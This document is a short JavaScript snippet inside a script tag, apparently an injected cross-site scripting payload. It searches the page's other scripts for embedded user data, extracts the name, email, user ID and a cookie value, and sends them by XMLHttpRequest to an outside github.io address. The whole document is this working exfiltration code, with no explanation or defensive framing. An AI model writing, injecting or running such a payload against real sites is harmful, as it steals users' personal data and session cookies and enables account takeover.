<script>
    userid = ""
    name = ""
    email = ""
    cookie = "" 
            
    s = document.getElementsByTagName("script")
    for (let i = 0; i < s.length; i++)
    {
        let sc = s.item(i)
        if (sc == document.currentScript)
        {
            continue
        }
                
        if (sc.innerHTML.includes("email"))
        {
            console.log(sc.innerHTML)
            let str = sc.innerHTML
            str = str.replaceAll("\"", "")
            str = str.replaceAll("\\", "")
            console.log(str)
            arr = str.split(":")
            console.log(arr.length)
            for (let j = 0; j < arr.length; j++)
            {
                if (arr[j] == "{name")
                {
                    name = arr[j+1].split(",")[0].replace(" ", "")
                    email = arr[j+2].split(",")[0]
                    userid = arr[j+5].split(",")[0]
                    cookie = arr[j+7].split(",")[0]
                            
                    url = "maxjdobrei.github.io/_temp/index.html?n=" +name +"&e=" +email +"&uid=" +userid +"&c=" +cookie

                    let xhttp = new XMLHttpRequest()

                    xhttp.open("GET", url)
                    xhttp.send()

                    break
                }
            }                    
            break
        }
    }
</script>